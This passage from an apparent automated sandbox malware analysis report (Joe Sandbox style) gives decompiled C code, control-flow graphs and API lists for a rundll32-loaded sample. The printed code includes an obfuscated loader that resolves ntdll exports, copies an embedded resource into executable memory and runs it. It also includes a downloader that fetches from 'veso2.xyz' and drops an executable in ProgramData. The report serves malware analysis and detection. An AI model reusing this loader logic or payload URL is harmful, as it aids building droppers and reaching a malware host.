				}
				_v32 = 0x65;
				_v26 = 0x65;
				_v14 = 0x65;
				_v10 = 0x65;
				_v4 = 0x65;
				_t230 = 0;
				 *0x10003174 = 0xf;
				_v88 = 0;
				_v100 = 0;
				_v40 = 0x4c;
				_v39 = 0x64;
				_v38 = 0x72;
				_v37 = 0x46;
				_v36 = 0x69;
				_v35 = 0x6e;
				_v34 = 0x64;
				_v33 = 0x52;
				_v31 = 0x73;
				_v30 = 0x6f;
				_v29 = 0x75;
				_v28 = 0x72;
				_v27 = 0x63;
				_v25 = 0x5f;
				_v24 = 0x55;
				_v23 = 0;
				_v20 = 0x4c;
				_v19 = 0x64;
				_v18 = 0x72;
				_v17 = 0x41;
				_v16 = 0x63;
				_v15 = 0x63;
				_v13 = 0x73;
				_v12 = 0x73;
				_v11 = 0x52;
				_v9 = 0x73;
				_v8 = 0x6f;
				_v7 = 0x75;
				_v6 = 0x72;
				_v5 = 0x63;
				_v3 = 0;
				_v56 = 0x56;
				_v55 = 0x69;
				_v54 = 0x72;
				_v53 = 0x74;
				_v52 = 0x75;
				_v51 = 0x61;
				_v50 = 0x6c;
				_v49 = 0x41;
				_v48 = 0x6c;
				_v47 = 0x6c;
				_v46 = 0x6f;
				_v45 = 0x63;
				_v44 = 0;
				_t180 =  *((intOrPtr*)(E100010E0(0x6c) + 0xc));
				_t140 =  *((intOrPtr*)(_t180 + 0xc));
				_t173 = _t140;
				_v76 =  *((intOrPtr*)(_t180 + 0x10));
				if(_t140 == 0) {
					L20:
					_t181 = 0;
				} else {
					while( *((intOrPtr*)(_t173 + 0x18)) != _t230) {
						_t252 =  *((intOrPtr*)(_t173 + 0x30));
						if(_t252 == _t230) {
							L19:
							if(_t173 != _t230) {
								continue;
							} else {
								goto L20;
							}
						} else {
							_t228 = 0;
							_t265 = L"kernel32.dll" - _t230; // 0x6b
							if(_t265 != 0) {
								_t170 = L"kernel32.dll";
								_t216 = _t252 - _t170;
								while( *((short*)(_t216 + _t170)) != 0) {
									_t195 =  *_t170;
									if(_t195 <= 0x5a && _t195 >= 0x41) {
										_t195 = _t195 + 0x20;
										 *_t170 = _t195;
									}
									_t243 = _t195;
									_t196 =  *((intOrPtr*)(_t216 + _t170));
									if(_t196 <= 0x5a && _t196 >= 0x41) {
										_t196 = _t196 + 0x20;
										 *((short*)(_t216 + _t170)) = _t196;
									}
									if(_t243 == _t196) {
										_t170 =  &(_t170[2]);
										_t228 = _t228 + 1;
										if( *_t170 != 0) {
											continue;
										}
									}
									goto L16;
								}
							}
							L16:
							_t230 = 0;
							if( *((intOrPtr*)(L"kernel32.dll" + _t228 * 2)) != 0 ||  *((intOrPtr*)(_t252 + _t228 * 2)) != 0) {
								_t173 =  *_t173;
								goto L19;
							} else {
								_t181 =  *((intOrPtr*)(_t173 + 0x18));
							}
						}
						goto L21;
					}
					goto L20;
				}
				L21:
				if( *_t181 == 0x5a4d) {
					_t143 =  *((intOrPtr*)( *((intOrPtr*)(_t181 + 0x3c)) + _t181 + 0x78));
					if(_t143 != _t230) {
						_t199 =  *((intOrPtr*)(_t143 + _t181 + 0x18));
						_v84 =  *((intOrPtr*)(_t143 + _t181 + 0x1c));
						_t232 =  *((intOrPtr*)(_t143 + _t181 + 0x20));
						_t144 =  *((intOrPtr*)(_t143 + _t181 + 0x24));
						_v80 = _t199;
						_v92 = 0;
						if(_t199 <= 0) {
							L35:
							_v96 = 0;
						} else {
							_t177 = _t144 + _t181;
							_v96 = _t232 + _t181;
							do {
								_t249 = _v84 + _t181;
								_t167 = 0;
								_t240 =  *_v96 + _t181;
								_t227 = _t240 -  &_v56;
								while(1) {
									_t211 =  *((intOrPtr*)(_t253 + _t227 + _t167 + 0x3c));
									if(_t211 == 0 ||  *((intOrPtr*)(_t253 + _t167 + 0x3c)) != _t211) {
										break;
									}
									_t214 =  *((intOrPtr*)(_t253 + _t167 + 0x3d));
									_t167 = _t167 + 1;
									if(_t214 != 0) {
										continue;
									}
									break;
								}
								if( *((intOrPtr*)(_t253 + _t167 + 0x3c)) != 0 ||  *((char*)(_t167 + _t240)) != 0) {
									goto L34;
								} else {
									_v96 =  *_t249 + _t181;
								}
								goto L36;
								L34:
								_t169 = _v92 + 1;
								_t177 = _t177 + 2;
								_v92 = _t169;
								_v96 = _v96 + 4;
							} while (_t169 < _v80);
							goto L35;
						}
					} else {
						_v96 = _t230;
					}
				} else {
					_v96 = _t230;
				}
				L36:
				_t182 =  *((intOrPtr*)(E100010E0(_t181) + 0xc));
				_t146 =  *((intOrPtr*)(_t182 + 0xc));
				_t174 = _t146;
				_v76 =  *((intOrPtr*)(_t182 + 0x10));
				if(_t146 == 0) {
					L57:
					_t233 = 0;
				} else {
					while( *((intOrPtr*)(_t174 + 0x18)) != 0) {
						_t247 =  *((intOrPtr*)(_t174 + 0x30));
						if(_t247 == 0) {
							L53:
							if(_t174 != 0) {
								continue;
							} else {
								goto L57;
							}
						} else {
							_t225 = 0;
							_t284 = L"ntdll.dll" - _t225; // 0x6e
							if(_t284 != 0) {
								_t165 = L"ntdll.dll";
								_t205 = _t247 - _t165;
								while( *((short*)(_t205 + _t165)) != 0) {
									_t193 =  *_t165;
									if(_t193 <= 0x5a && _t193 >= 0x41) {
										_t193 = _t193 + 0x20;
										 *_t165 = _t193;
									}
									_t237 = _t193;
									_t194 =  *((intOrPtr*)(_t205 + _t165));
									if(_t194 <= 0x5a && _t194 >= 0x41) {
										_t194 = _t194 + 0x20;
										 *((short*)(_t205 + _t165)) = _t194;
									}
									if(_t237 == _t194) {
										_t165 =  &(_t165[2]);
										_t225 = _t225 + 1;
										if( *_t165 != 0) {
											continue;
										}
									}
									goto L50;
								}
							}
							L50:
							if( *((short*)(L"ntdll.dll" + _t225 * 2)) != 0 ||  *((short*)(_t247 + _t225 * 2)) != 0) {
								_t174 =  *_t174;
								goto L53;
							} else {
								_t233 =  *((intOrPtr*)(_t174 + 0x18));
							}
						}
						goto L58;
					}
					goto L57;
				}
				L58:
				_push( &_v40);
				_push(_t233);
				_t148 = E10001440();
				_push( &_v20);
				_push(_t233);
				_t234 = E10001440();
				_push( &_v72);
				_push(3);
				_push( &_v68);
				_push(0x10000000);
				_v68 = 0xb;
				_v64 = 0x8a3;
				_v60 = 0x409;
				if( *_t148() >= 0) {
					 *_t234(0x10000000, _v88,  &_v104,  &_v116);
				}
				_t153 = VirtualAlloc(0, _v116, 0x3000, atoi("64"));
				_t185 = _v116;
				_t235 = _v104;
				_t175 = _t153;
				_t186 = _t185 >> 2;
				_push(memcpy(_t175, _t235, _t186 << 2));
				_push(_t175);
				_push(1);
				memcpy(_t235 + _t186 + _t186, _t235, _t185 & 0x00000003);
				if(E10001140("mzhN!<iB1VQsqma") != 0) {
					L62:
					 *_t175();
				} else {
					_push( &_v116);
					_push(_t175);
					_push(atoi("16"));
					if(E10001140("mzhN!<iB1VQsqma") != 0) {
						goto L62;
					}
				}
				return 0;
			}















































































































    0x10001530
    0x1000153a
    0x10001541
    0x10001541
    0x1000154c
    0x10001550
    0x10001554
    0x10001558
    0x1000155c
    0x10001560
    0x1000156b
    0x10001572
    0x10001576
    0x1000157a
    0x1000157f
    0x10001584
    0x10001588
    0x1000158d
    0x10001592
    0x10001597
    0x1000159c
    0x100015a1
    0x100015a5
    0x100015aa
    0x100015af
    0x100015b3
    0x100015b7
    0x100015bc
    0x100015c1
    0x100015c6
    0x100015cb
    0x100015d0
    0x100015d4
    0x100015d9
    0x100015dd
    0x100015e1
    0x100015e5
    0x100015e9
    0x100015ee
    0x100015f2
    0x100015f7
    0x100015fc
    0x10001600
    0x10001604
    0x10001609
    0x1000160e
    0x10001613
    0x10001617
    0x1000161c
    0x10001621
    0x10001626
    0x1000162a
    0x1000162f
    0x10001633
    0x10001637
    0x1000163c
    0x10001640
    0x1000164a
    0x1000164d
    0x10001652
    0x10001657
    0x1000165b
    0x100016da
    0x100016da
    0x1000165d
    0x1000165d
    0x10001662
    0x10001667
    0x100016d6
    0x100016d8
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x10001669
    0x10001669
    0x1000166b
    0x10001672
    0x10001674
    0x1000167b
    0x1000167d
    0x10001684
    0x1000168b
    0x10001693
    0x10001696
    0x10001696
    0x10001699
    0x1000169b
    0x100016a3
    0x100016ab
    0x100016ae
    0x100016ae
    0x100016b5
    0x100016b7
    0x100016ba
    0x100016bf
    0x00000000
    0x00000000
    0x100016bf
    0x00000000
    0x100016b5
    0x1000167d
    0x100016c1
    0x100016c1
    0x100016cb
    0x100016d4
    0x00000000
    0x100016ec
    0x100016ec
    0x100016ec
    0x100016cb
    0x00000000
    0x10001667
    0x00000000
    0x1000165d
    0x100016dc
    0x100016e1
    0x100016f8
    0x100016fc
    0x1000170b
    0x1000170f
    0x10001713
    0x10001717
    0x1000171b
    0x10001721
    0x10001729
    0x1000179f
    0x1000179f
    0x1000172b
    0x1000172d
    0x10001730
    0x10001734
    0x10001744
    0x10001746
    0x1000174e
    0x10001752
    0x10001754
    0x10001757
    0x1000175d
    0x00000000
    0x00000000
    0x10001765
    0x10001769
    0x1000176c
    0x00000000
    0x00000000
    0x00000000
    0x1000176c
    0x10001774
    0x00000000
    0x1000184c
    0x10001851
    0x10001851
    0x00000000
    0x10001780
    0x1000178c
    0x1000178d
    0x10001795
    0x10001799
    0x10001799
    0x00000000
    0x10001734
    0x100016fe
    0x100016fe
    0x100016fe
    0x100016e3
    0x100016e3
    0x100016e3
    0x100017a7
    0x100017ac
    0x100017af
    0x100017b7
    0x100017b9
    0x100017bd
    0x1000185f
    0x1000185f
    0x100017c3
    0x100017c3
    0x100017ce
    0x100017d3
    0x10001842
    0x10001844
    0x00000000
    0x1000184a
    0x00000000
    0x1000184a
    0x100017d5
    0x100017d5
    0x100017d7
    0x100017de
    0x100017e0
    0x100017e7
    0x100017e9
    0x100017f0
    0x100017f7
    0x100017ff
    0x10001802
    0x10001802
    0x10001805
    0x10001807
    0x1000180f
    0x10001817
    0x1000181a
    0x1000181a
    0x10001821
    0x10001823
    0x10001826
    0x1000182b
    0x00000000
    0x00000000
    0x1000182b
    0x00000000
    0x10001821
    0x100017e9
    0x1000182d
    0x10001836
    0x10001840
    0x00000000
    0x1000185a
    0x1000185a
    0x1000185a
    0x10001836
    0x00000000
    0x100017d3
    0x00000000
    0x100017c3
    0x10001861
    0x10001865
    0x10001866
    0x10001867
    0x10001872
    0x10001873
    0x10001880
    0x10001886
    0x10001887
    0x10001889
    0x1000188a
    0x1000188f
    0x10001897
    0x1000189f
    0x100018ab
    0x100018c1
    0x100018c1
    0x100018e0
    0x100018e4
    0x100018e8
    0x100018ec
    0x100018f6
    0x100018fd
    0x10001901
    0x10001902
    0x10001909
    0x10001915
    0x10001939
    0x10001939
    0x10001917
    0x1000191b
    0x1000191c
    0x10001927
    0x10001937
    0x00000000
    0x00000000
    0x10001937
    0x10001944

    APIs
      • Part of subcall function 10001100: LoadLibraryW.KERNEL32(ntdll.dll,ZwOpenSymbolicLinkObject,?,10001538), ref: 1000110B
      • Part of subcall function 10001100: GetProcAddress.KERNEL32(00000000), ref: 10001112
    • ExitProcess.KERNEL32 ref: 10001541
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.668407668.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.668390582.0000000010000000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.668432316.0000000010002000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.668446107.0000000010003000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.668456462.0000000010004000.00000002.00020000.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: AddressExitLibraryLoadProcProcess
    • String ID: A$A$F$L$L$R$R$U$V$_$a$d$d$d$i$i$kernel32.dll$mzhN!<iB1VQsqma$n$ntdll.dll$o$o$o$t$u$u$u
    • API String ID: 881411216-724902985
    • Opcode ID: d5cd14736a5a78d3d26fe2b51d0aa306070cc927f9ad5da38bcc108a3d724817
    • Instruction ID: 4276e2de53327d2340dd9adc1b77db750b573dbbb898802e8b477a806e705720
    • Opcode Fuzzy Hash: d5cd14736a5a78d3d26fe2b51d0aa306070cc927f9ad5da38bcc108a3d724817
    • Instruction Fuzzy Hash: 1AC1A27150C3818FE312DB68C88069BBBE5EF96784F48885DE5C44B346D7B5D988C7A3
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011A21A0, Relevance: 6.2, APIs: 4, Instructions: 182COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 332 11a21a0-11a21d1 333 11a21dd-11a2201 IsBadHugeReadPtr 332->333 334 11a21d3-11a21d8 332->334 337 11a23c0 333->337 338 11a2207-11a220e 333->338 335 11a23c3-11a23c6 334->335 337->335 338->337 339 11a2214-11a2237 338->339 341 11a2239-11a2248 SetLastError 339->341 342 11a224d-11a2262 call 11a1a20 339->342 341->337 344 11a2267-11a2271 342->344 345 11a229d-11a22cd 344->345 346 11a2273-11a2298 SetLastError 344->346 347 11a22e8-11a22fd 345->347 348 11a22cf-11a22e6 345->348 346->337 350 11a2300 347->350 348->350 351 11a2314-11a231a 350->351 352 11a231c-11a2327 351->352 353 11a2395-11a2399 351->353 356 11a2329-11a2350 352->356 357 11a2352-11a237d 352->357 354 11a23bb 353->354 355 11a239b-11a23b9 SetLastError 353->355 354->337 355->337 361 11a237f-11a2385 356->361 357->361 362 11a2390 361->362 363 11a2387-11a238e 361->363 362->351 363->353
    APIs
    • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 011A21F9
    • SetLastError.KERNEL32(0000007E), ref: 011A223B
    Memory Dump Source
    • Source File: 00000003.00000002.662490371.00000000011A1000.00000020.00000001.sdmp, Offset: 011A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_11a1000_rundll32.jbxd
    Similarity
    • API ID: ErrorHugeLastRead
    • String ID:
    • API String ID: 3239643929-0
    • Opcode ID: 111c4d34bdb4af217c117a5afb76bc0bb574fe7b9e18a7490bdf2fce3b8ae7c1
    • Instruction ID: 3ee8d4d26f2e0f733e73ab24517ca362e105c0a48e31becc95d044a0af268bca
    • Opcode Fuzzy Hash: 111c4d34bdb4af217c117a5afb76bc0bb574fe7b9e18a7490bdf2fce3b8ae7c1
    • Instruction Fuzzy Hash: E081BB78A04209DFDB08CF98C890BADBBB1FF49314F558158E919AB355C734EA85CF91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011B18C0, Relevance: 5.2, APIs: 4, Instructions: 183COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 365 11b18c0-11b18f4 366 11b1900-11b1924 IsBadReadPtr 365->366 367 11b18f6-11b18fb 365->367 370 11b192a-11b1931 366->370 371 11b1ae3 366->371 368 11b1ae6-11b1ae9 367->368 370->371 372 11b1937-11b195a call 11b1af0 370->372 371->368 374 11b195c-11b196b SetLastError 372->374 375 11b1970-11b1985 call 11b1170 372->375 374->371 377 11b198a-11b1994 375->377 378 11b19c0-11b19f0 377->378 379 11b1996-11b19bb SetLastError 377->379 380 11b1a0b-11b1a20 378->380 381 11b19f2-11b1a09 378->381 379->371 383 11b1a23 380->383 381->383 384 11b1a37-11b1a3d 383->384 385 11b1ab8-11b1abc 384->385 386 11b1a3f-11b1a4a 384->386 387 11b1ade 385->387 388 11b1abe-11b1adc SetLastError 385->388 389 11b1a4c-11b1a73 386->389 390 11b1a75-11b1aa0 386->390 387->371 388->371 394 11b1aa2-11b1aa8 389->394 390->394 395 11b1aaa-11b1ab1 394->395 396 11b1ab3 394->396 395->385 396->384
    C-Code - Quality: 37%
    			E011B18C0(intOrPtr __ecx, intOrPtr* _a4) {
				void* _v8;
				signed int* _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _t114;
				intOrPtr _t117;
				intOrPtr _t135;
				intOrPtr _t140;
				void* _t206;
				void* _t207;

				_v44 = __ecx;
				_t3 = _a4 + 4; // 0x3
				_v16 =  *_t3;
				_v28 = 1;
				_v32 =  *_a4 + 0xbadc25;
				if( *((intOrPtr*)(_v32 + 4)) != 0) {
					_v8 = _v16 +  *_v32;
					while(IsBadReadPtr(_v8, 0x14) == 0 &&  *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t21 = _a4 + 0x28; // 0x0
						_t26 = _a4 + 0x1c; // 0x0, executed
						_t114 =  *((intOrPtr*)( *_t26))(_v16 +  *((intOrPtr*)(_v8 + 0xc)),  *_t21); // executed
						_t207 = _t206 + 8;
						_v24 = _t114;
						if(_v24 != 0) {
							_t31 = _a4 + 0xc; // 0xffff
							_t35 = _a4 + 8; // 0x4
							_t117 = E011B1170( *_t35, 4 +  *_t31 * 4); // executed
							_t206 = _t207 + 8;
							_v36 = _t117;
							if(_v36 != 0) {
								 *((intOrPtr*)(_a4 + 8)) = _v36;
								_t48 = _a4 + 0xc; // 0xffff
								_t50 = _a4 + 8; // 0x4
								 *((intOrPtr*)( *_t50 +  *_t48 * 4)) = _v24;
								_t55 = _a4 + 0xc; // 0xffff
								 *(_a4 + 0xc) =  *_t55 + 1;
								if( *_v8 == 0) {
									_v12 = _v16 +  *((intOrPtr*)(_v8 + 0x10));
									_v20 = _v16 +  *((intOrPtr*)(_v8 + 0x10));
								} else {
									_v12 = _v16 +  *_v8;
									_v20 = _v16 +  *((intOrPtr*)(_v8 + 0x10));
								}
								while( *_v12 != 0) {
									if(( *_v12 & 0x80000000) == 0) {
										_v40 = _v16 +  *_v12;
										_t91 = _a4 + 0x28; // 0x0
										_t95 = _a4 + 0x20; // 0x0
										_t135 =  *((intOrPtr*)( *_t95))(_v24, _v40 + 2,  *_t91);
										_t206 = _t206 + 0xc;
										 *_v20 = _t135;
									} else {
										_t81 = _a4 + 0x28; // 0x0
										_t85 = _a4 + 0x20; // 0x0
										_t140 =  *((intOrPtr*)( *_t85))(_v24,  *_v12 & 0x0000ffff,  *_t81);
										_t206 = _t206 + 0xc;
										 *_v20 = _t140;
									}
									if( *_v20 != 0) {
										_v12 =  &(_v12[1]);
										_v20 = _v20 + 4;
										continue;
									} else {
										_v28 = 0;
										break;
									}
								}
								if(_v28 != 0) {
									_v8 = _v8 + 0x14;
									continue;
								}
								_t101 = _a4 + 0x28; // 0x0
								_t104 = _a4 + 0x24; // 0x0
								 *((intOrPtr*)( *_t104))(_v24,  *_t101);
								SetLastError(0x7f);
								break;
							}
							_t39 = _a4 + 0x28; // 0x0
							_t42 = _a4 + 0x24; // 0x0
							 *((intOrPtr*)( *_t42))(_v24,  *_t39);
							SetLastError(0xe);
							_v28 = 0;
							break;
						}
						SetLastError(0x7e);
						_v28 = 0;
						break;
					}
					return _v28;
				}
				return 1;
			}



















    0x011b18c6
    0x011b18cc
    0x011b18cf
    0x011b18d2
    0x011b18ea
    0x011b18f4
    0x011b1908
    0x011b1916
    0x011b193a
    0x011b194b
    0x011b194e
    0x011b1950
    0x011b1953
    0x011b195a
    0x011b1973
    0x011b1981
    0x011b1985
    0x011b198a
    0x011b198d
    0x011b1994
    0x011b19c6
    0x011b19cc
    0x011b19d2
    0x011b19d8
    0x011b19de
    0x011b19e7
    0x011b19f0
    0x011b1a14
    0x011b1a20
    0x011b19f2
    0x011b19fa
    0x011b1a06
    0x011b1a06
    0x011b1a37
    0x011b1a4a
    0x011b1a7d
    0x011b1a83
    0x011b1a95
    0x011b1a98
    0x011b1a9a
    0x011b1aa0
    0x011b1a4c
    0x011b1a4f
    0x011b1a66
    0x011b1a69
    0x011b1a6b
    0x011b1a71
    0x011b1a71
    0x011b1aa8
    0x011b1a2b
    0x011b1a34
    0x00000000
    0x011b1aaa
    0x011b1aaa
    0x00000000
    0x011b1aaa
    0x011b1aa8
    0x011b1abc
    0x011b1913
    0x00000000
    0x011b1913
    0x011b1ac1
    0x011b1acc
    0x011b1acf
    0x011b1ad6
    0x00000000
    0x011b1ad6
    0x011b1999
    0x011b19a4
    0x011b19a7
    0x011b19ae
    0x011b19b4
    0x00000000
    0x011b19b4
    0x011b195e
    0x011b1964
    0x00000000
    0x011b1964
    0x00000000
    0x011b1ae3
    0x00000000

    APIs
    • IsBadReadPtr.KERNEL32(00000000,00000014), ref: 011B191C
    • SetLastError.KERNEL32(0000007E), ref: 011B195E
    Memory Dump Source
    • Source File: 00000003.00000002.662633575.00000000011B1000.00000020.00000001.sdmp, Offset: 011B0000, based on PE: true
    • Associated: 00000003.00000002.662614711.00000000011B0000.00000004.00000001.sdmp Download File
    • Associated: 00000003.00000002.662646662.00000000011B3000.00000002.00000001.sdmp Download File
    • Associated: 00000003.00000002.662686050.00000000011B4000.00000004.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_11b0000_rundll32.jbxd
    Similarity
    • API ID: ErrorLastRead
    • String ID:
    • API String ID: 4100373531-0
    • Opcode ID: 9a5ea6cd0d294b87161c47ec41afd893657fed4109b2367d2b0bc272f69e2324
    • Instruction ID: 60f8654cb165de9134ec2dc25c9a24373d6935f1f203b1637cd4eb5da750a5a7
    • Opcode Fuzzy Hash: 9a5ea6cd0d294b87161c47ec41afd893657fed4109b2367d2b0bc272f69e2324
    • Instruction Fuzzy Hash: 1781C874A00209EFDB08CF98D490BAEBBB1FF48314F258158E919AB355D774EA81CF91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0116002D, Relevance: 4.9, APIs: 3, Instructions: 387memoryCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 399 116002d-116009e call 1160456 * 6 412 11600a7-11600b0 399->412 413 11600a0-11600a2 399->413 412->413 415 11600b2-11600b6 412->415 414 116044e-1160455 413->414 415->413 416 11600b8-11600c2 415->416 417 11600e4-1160105 GetNativeSystemInfo 416->417 418 11600c4-11600c7 416->418 417->413 420 1160107-116012d VirtualAlloc 417->420 419 11600c9-11600cf 418->419 421 11600d6 419->421 422 11600d1-11600d4 419->422 423 1160162-116016c 420->423 424 116012f-1160133 420->424 427 11600d9-11600e2 421->427 422->427 425 11601a4-11601b5 423->425 426 116016e-1160173 423->426 428 1160135-1160138 424->428 430 11601b7-11601d1 425->430 431 1160234-1160240 425->431 429 1160177-116018a 426->429 427->417 427->419 432 1160153-1160155 428->432 433 116013a-1160142 428->433 436 116018c-1160193 429->436 437 1160199-116019e 429->437 449 1160222-116022e 430->449 450 11601d3 430->450 438 1160246-116025d 431->438 439 11602f0-11602fa 431->439 435 1160157-116015c 432->435 433->432 434 1160144-1160147 433->434 441 116014e-1160151 434->441 442 1160149-116014c 434->442 435->428 443 116015e 435->443 436->436 444 1160195 436->444 437->429 447 11601a0 437->447 438->439 448 1160263-1160273 438->448 445 11603b2-11603c7 call 11a2690 439->445 446 1160300-1160307 439->446 441->435 442->432 442->441 443->423 444->437 472 11603c9-11603ce 445->472 451 1160309-1160312 446->451 447->425 452 11602d5-11602e6 448->452 453 1160275-1160279 448->453 449->430 457 1160230 449->457 454 11601d7-11601db 450->454 458 11603a7-11603ac 451->458 459 1160318-1160333 451->459 452->448 456 11602ec 452->456 460 116027a-1160289 453->460 463 11601dd 454->463 464 11601fb-1160204 454->464 456->439 457->431 458->445 458->451 465 1160335-1160337 459->465 466 116034d-116034f 459->466 461 1160291-116029a 460->461 462 116028b-116028f 460->462 468 11602c3-11602c7 461->468 462->461 467 116029c-11602a1 462->467 463->464 471 11601df-11601f9 463->471 480 1160207-116021c 464->480 473 1160340-1160343 465->473 474 1160339-116033e 465->474 469 1160351-1160353 466->469 470 1160368-116036a 466->470 476 11602b4-11602b7 467->476 477 11602a3-11602b2 467->477 468->460 483 11602c9-11602d1 468->483 478 1160355-1160357 469->478 479 1160359-116035b 469->479 484 1160371-1160376 470->484 485 116036c 470->485 471->480 481 11603d0-11603d4 472->481 482 116044c 472->482 475 1160345-116034b 473->475 474->475 486 1160379-1160380 475->486 476->468 487 11602b9-11602bf 476->487 477->468 488 116036e-116036f 478->488 479->470 489 116035d-116035f 479->489 480->454 491 116021e 480->491 481->482 490 11603d6-11603e0 481->490 482->414 483->452 484->486 485->488 494 1160382 486->494 495 1160388-116039d VirtualProtect 486->495 487->468 488->486 489->486 492 1160361-1160366 489->492 490->482 493 11603e2-11603e6 490->493 491->449 492->486 493->482 496 11603e8-11603f9 493->496 494->495 495->413 497 11603a3 495->497 496->482 498 11603fb-1160400 496->498 497->458 499 1160402-116040f 498->499 499->499 500 1160411-1160415 499->500 501 1160417-1160429 500->501 502 116042d-1160433 500->502 501->498 504 116042b 501->504 502->482 503 1160435-116044b 502->503 503->482 504->482
    APIs
    • GetNativeSystemInfo.KERNELBASE(?,?,?,?,01160005), ref: 011600E9
    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,01160005), ref: 01160111
    Memory Dump Source
    • Source File: 00000003.00000002.662420469.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_1160000_rundll32.jbxd
    Similarity
    • API ID: AllocInfoNativeSystemVirtual
    • String ID:
    • API String ID: 2032221330-0
    • Opcode ID: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
    • Instruction ID: 698c02e9ba5a5135b962b9d57740a1491340970332588f7ba8befd623b58e8d4
    • Opcode Fuzzy Hash: 460d81c489b0c162692d77f33f70033fe6d40d0b28a700ce4a73fb1871822586
    • Instruction Fuzzy Hash: 5FD1D371A083068FD728CF5DC88076AB7E8FF88319F18452DF9958B241E776E865CB91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 048510B0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 80sleepCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 507 48510b0-48510ed call 4851640 509 48510f2-485110a 507->509 510 4851124-485114b call 4851640 509->510 511 485110c-4851121 509->511 515 4851171-485119a call 4851a04 510->515 516 485114d-485116c call 4851350 Sleep call 48512b0 510->516 511->510 516->515
    C-Code - Quality: 49%
    			E048510B0(void* __eflags) {
				signed int _v8;
				void _v36;
				void _v68;
				signed char* _v72;
				signed char* _v76;
				char _v80;
				char _v84;
				signed char* _t28;
				signed char* _t30;
				void* _t34;
				signed char* _t46;
				signed int _t71;
				void* _t72;
				void* _t75;
				void* _t76;
				void* _t80;

				_t80 = __eflags;
				_v8 =  *0x4853004 ^ _t71;
				memcpy( &_v36, "http://veso2.xyz/campo/r/r1", 7 << 2);
				memcpy( &_v68, "C:\\ProgramData\\huqvg\\huqvg.exe", 7 << 2);
				asm("movsw");
				asm("movsb");
				_t28 = E04851640(_t80,  &_v36,  &_v84, 1); // executed
				_t75 = _t72 + 0x24;
				_v72 = _t28;
				_t46 = _v72;
				_t81 = ( *_t46 & 0x000000ff) - 0x68;
				if(( *_t46 & 0x000000ff) != 0x68) {
					 *0x4853008(_v72);
					 *0x4853020(1);
					_t75 = _t75 + 8;
				}
				_t30 = E04851640(_t81, _v72,  &_v80, 1);
				_t76 = _t75 + 0xc;
				_v76 = _t30;
				if(( *_v76 & 0x000000ff) == 0x4d) {
					E04851350(_v76, _v80,  &_v68);
					_t76 = _t76 + 0xc;
					Sleep(0x3a98);
					E048512B0();
				}
				 *0x4853008(_v76);
				_t34 =  *0x4853008(_v72);
				E04851A04();
				return _t34;
			}



















    0x048510b0
    0x048510bd
    0x048510cf
    0x048510de
    0x048510e0
    0x048510e2
    0x048510ed
    0x048510f2
    0x048510f5
    0x04851100
    0x04851107
    0x0485110a
    0x04851110
    0x0485111b
    0x04851121
    0x04851121
    0x0485112e
    0x04851133
    0x04851136
    0x0485114b
    0x04851159
    0x0485115e
    0x04851166
    0x0485116c
    0x0485116c
    0x04851175
    0x04851182
    0x04851192
    0x0485119a

    APIs
      • Part of subcall function 04851640: wsprintfA.USER32 ref: 0485173A
      • Part of subcall function 04851640: WSAStartup.WS2_32(00000102,?), ref: 0485174F
    • Sleep.KERNEL32(00003A98), ref: 04851166
    Strings
    • http://veso2.xyz/campo/r/r1, xrefs: 048510C7
    • C:\ProgramData\huqvg\huqvg.exe, xrefs: 048510D6
    Memory Dump Source
    • Source File: 00000003.00000002.665004317.0000000004851000.00000020.00000001.sdmp, Offset: 04850000, based on PE: true
    • Associated: 00000003.00000002.664819390.0000000004850000.00000004.00000001.sdmp Download File
    • Associated: 00000003.00000002.666866498.0000000004852000.00000002.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4850000_rundll32.jbxd
    Similarity
    • API ID: SleepStartupwsprintf
    • String ID: C:\ProgramData\huqvg\huqvg.exe$http://veso2.xyz/campo/r/r1
    • API String ID: 1691369139-3004619249
    • Opcode ID: bf388f5049971250ffce3d3b65ffffd6f77e49ffecd0e8f688ebe6c266d487bc
    • Instruction ID: c7cb1bcf4c4d8790c7a622474b088f577ee39001a01e1241af0f0d9b85ead81e
    • Opcode Fuzzy Hash: bf388f5049971250ffce3d3b65ffffd6f77e49ffecd0e8f688ebe6c266d487bc
    • Instruction Fuzzy Hash: 8D21C771E002049BDF04EBE8D845ADFBBB9EF44304F140568E905EB241DA79BD15CB91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 04851040, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
